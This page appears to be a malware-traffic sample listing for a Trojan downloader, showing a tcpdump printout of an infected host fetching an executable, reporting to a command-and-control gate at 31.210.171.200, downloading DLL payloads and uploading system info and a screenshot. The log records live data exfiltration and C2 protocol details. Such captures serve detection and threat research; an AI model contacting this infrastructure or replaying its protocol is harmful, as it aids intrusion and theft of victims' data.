Text Example

POST /gate/log.php 31.210.171.200 Malware Dropper Trojan Downloader PCAP File Download Traffic Sample

Download Attachments

  • 1 pcap 1
    Date added: May 30, 2019 6:09 am Added by: admin File size: 7 MB Downloads: 9

2019-05-29 23:39:48.912311 IP 10.1.10.162.49184 > 10.1.10.224.80: Flags [P.], seq 3097589712:3097590130, ack 2503829794, win 16425, length 418: HTTP: GET /1.exe HTTP/1.1
E…..@…..
.
.
.
.. .P..w..=i”P.@)….GET /1.exe HTTP/1.1
Accept: application/x-ms-application, image/jpeg, application/xaml+xml, image/gif, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Accept-Encoding: gzip, deflate
Host: 10.1.10.224
Connection: Keep-Alive

2019-05-29 23:39:49.588931 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 109501:110961, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
.
.
..P. .?….yrP…….@……….t…..H.F………82A……..F…..”A..7….X.F…..”A..&….d.F.3.ZYYd..h..A………]…d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F…..d.F.p…d.F.q…d.F.r…d.F.s…d.F.t…d.F.u…
d.F.v…d.F.w…d.F.x…d.F.y…d.F.z…d.F.{…d.F.|…d.F.}…d.F.~…d.F…..d.F.`…d.F.a…d.F.b…d.F.c…d.F.d…d.F.e…d.F.f…d.F.g…d.F.h…d.F.i…d.F.j…d.F.k…d.F.l…d.F.m…d.F.n…d.F.o…d.F.P…d.F.Q…d.F.R…d.F
.S…d.F.T…d.F.U…d.F.V…d.F.W…d.F.X…d.F.Y…d.F.Z…d.F.[…d.F….d.F.]…d.F.^…d.F._…d.F.@…d.F.A…d.F.B…d.F.C…d.F.D…d.F.E…d.F.F…d.F.G…d.F.H…d.F.I…d.F.J…d.F.K…d.F.L…d.F.M…d.F.N…d.F.O…d.F.0.
..d.F.1…d.F.2…d.F.3…d.F.4…d.F.5…d.F.6…d.F.7…d.F.8…d.F.9…d.F.:…d.F.;…d.F.<…U..3.Uh..A.d.0d. ….F.3.ZYYd..h..A…6…..]….-..F…..A…TColor……….@.4.A………………………..4.A…..@w@..;@..;@..;@.. <@..;@.(9@.D9@..9@..EInvalidGraphic..A………………………….A…..@w@..;@..;@..;@..<@..;@.(9@.D9@..9@..EInvalidGraphicOperation.@…A.. TFontPitch………..A. fpDefault fpVariable.fpFixed.Graphics…A. TFontName…A…TFontCharset………. .A.. TFontStyle………..A..fsBold.fsItalic.fsUnderline.fsStrikeOut.Graphics..p.A…TFontStyles…A…..A.. TPenStyle………..A..psSolid.psDash.psDot psDashDot.psDashDotDot.psClear.psInsideFrame.Graphics…A…TPenMode………..A..p mBlack.pmWhite.pmNop.pmNot.pmCopy pmNotCopy.pmMergePe 2019-05-29 23:39:49.590576 IP 10.1.10.224.80 > 10.1.10.162.49184: Flags [P.], seq 173741:175201, ack 418, win 237, length 1460: HTTP
E…..@.@…
.
2019-05-29 23:40:00.458551 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 1054931223:1054931413, ack 2808420310, win 16425, length 190: HTTP: POST /gate/log.php HTTP/1.1
E…..@…..
.
……$.P>….e..P.@)….POST /gate/log.php HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 155
Host: 31.210.171.200

2019-05-29 23:40:00.458560 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 190:345, ack 1, win 16425, length 155: HTTP
E…..@…..
.
……$.P>….e..P.@).2..params=Ym90X2lkPUYyQkMyQjBCLUM3MjYtNEVBMi04RjdELTVDMzA1NEQ4RkExRl9yeTR3biZjb25maWdfaWQ9NTkwMzI0ZDZkMzE1YjBmMDdmMDFkNjlkZWQ0MGNkYTM4NmZiMDk0NiZkYXRhPW51bGw=
2019-05-29 23:40:00.724098 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.o@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{“url”:”http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate”,”attachment_url”:”http://31.210.171.200/gate/sqlite3.dll”,”libraries”:”http://31.210.171.200/gate/libs.zip”,”ip”:”73.135.186.44″,”config”:{“masks”:null,”loader_urls”:null}}
0

2019-05-29 23:40:01.027541 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 1:567, ack 345, win 245, length 566: HTTP: HTTP/1.1 200 OK
E .^.p@.4…….
.
..P.$.e..>..pP…Y…HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:00 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

15f
{“url”:”http://31.210.171.200/file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate”,”attachment_url”:”http://31.210.171.200/gate/sqlite3.dll”,”libraries”:”http://31.210.171.200/gate/libs.zip”,”ip”:”73.135.186.44″,”config”:{“masks”:null,”loader_urls”:null}}

2019-05-29 23:40:01.135113 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 2907559582:2907559879, ack 1455228641, win 16425, length 297: HTTP: GET /gate/sqlite3.dll HTTP/1.1
E..Q..@….Q
.
……%.P.M..V…P.@)i…GET /gate/sqlite3.dll HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:03.662144 IP 10.1.10.162.49189 > 31.210.171.200.80: Flags [P.], seq 297:591, ack 917003, win 65335, length 294: HTTP: GET /gate/libs.zip HTTP/1.1
E..N..@….V
.
……%.P.M..V…P..7B…GET /gate/libs.zip HTTP/1.1
Accept: /
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Host: 31.210.171.200
Connection: Keep-Alive

2019-05-29 23:40:05.273384 IP 31.210.171.200.80 > 10.1.10.162.49189: Flags [P.], seq 3744744:3745578, ack 591, win 245, length 834: HTTP
E .j..@.4…….
.
..P.%V...M..P…8P……..znN..i..(..8G….$……. …G.).api-ms-win-core-file-l2-1-0.dll . ………d0.^....R^%.....R^%....PK...........znNB.p.a(..8G..!.$....... ...Z.*.api-ms-win-core-handle-l1-1-0.dll . .........nW.^…..^%……^%….PK………..znN ..q.)..8G….$……. ….?.api-ms-win-core-heap-l1-1-0.dll
. ………nW.^...G._%....G._%....PK...........znN...##'...E..&.$....... ...:i*.api-ms-win-core-interlocked-l1-1-0.dll . ..........~.^…y.%….y.%….PK………..znNL…J)..8I..(.$……. …...api-ms-win-core-libraryloader-l1-1-0.dll . ……….~.^.....%……%....PK...........znN.....+..8Q..'.$....... ...1.*.api-ms-win-core-localization-l1-2-0.dll . ............^….N%.....N%….PK………..znN1….)..8I..!.$……. …?..api-ms-win-core-memory-l1-1-0.dll
. …………^.....%……`%….PK……:.:.t…..+…
2019-05-29 23:40:14.608543 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 345:689, ack 567, win 16283, length 344: HTTP: POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
E….a@…..
.
……$.P>..p.e..P.?…..POST /file_handler/file.php?hash=fd6a281324a57b6258a807e86a258957a8bf4bde&js=21b42a021c078f99045bddc55087e5af4bfd64bc&callback=http://31.210.171.200/gate HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Content-Type: multipart/form-data, boundary=Jfbvjwj3489078yuyetu
Content-Length: 63918
Host: 31.210.171.200

2019-05-29 23:40:15.012041 IP 10.1.10.162.49188 > 31.210.171.200.80: Flags [P.], seq 63469:64607, ack 567, win 16283, length 1138: HTTP
E…..@…..
.
……$.P>….e..P.?.f…….8..b..Hl
.giT…BX:..D..7Y%3.4
…~$Z.8….K.u6.T………H….0}………….](..J.wK..b.Is…..@..}……….}o…..h..j..HP.JT.”..’B.A_u.hn”..S…;..R;..!.
-.fual[.MZ.L.qn.W.s.9.t=….C..S.=…@.M…fW4,w..4y.d-…/…….T..bf.2M…….eWoh…,./….;?+.S.PP.C...I.........K....[ RM.q. jTx.x... 8:W<!.+..j.4..(....W...."..O.......zD^.].....[..i..F.=.B..0.1.>..1..'...J.........0V..5.. c..._..3..>_.../ ..+N..X...v.H..R.....{I,..u..Z.^..\.E.$. ~...[5. ^o...P.bY.h.......w...$+.~t..57.0g...e.V%Q.R..M3..fm-1...]o+.x.F....E....W.......R.W.(..|.......<b.8..}7..:.>...srt6.r.....B.. U?V.$y.{..{..(..7.....r&%..u)D.V.C]..." ..y...&]7......@.%t&.{W. UZZ..#.....K.N..N@.;....o{...W.yl..E>.xT.D.^._...'9.p.Qw.?.....1V=..M...{W.vr)Tg.....Sp...g.....+."..............e...U...{...D0iZ...,.... ...].G2.......K …#….E.l.]..UN.v)……W gt.c..f}.Q….]..)6.…]..0………Fi.{ 4a&K……..6#…….nK.’.;……U..Z……e.|.Yb…’….z…..GVRI.F.8…PK………….NF.i……….. ……. …….System Info.txtUT….4.\PK………….N….Z…….
. ……. …….screen.pngUT….4.\PK…………..n…..
–Jfbvjwj3489078yuyetu–
2019-05-29 23:40:15.573069 IP 31.210.171.200.80 > 10.1.10.162.49188: Flags [P.], seq 567:793, ack 64607, win 1252, length 226: HTTP: HTTP/1.1 200 OK
E .
..@.4…….
.
..P.$.e..>..vP….v..HTTP/1.1 200 OK
Server: nginx/1.10.3 (Ubuntu)
Date: Thu, 30 May 2019 03:40:15 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *

d
true”success”
0

Leave a Reply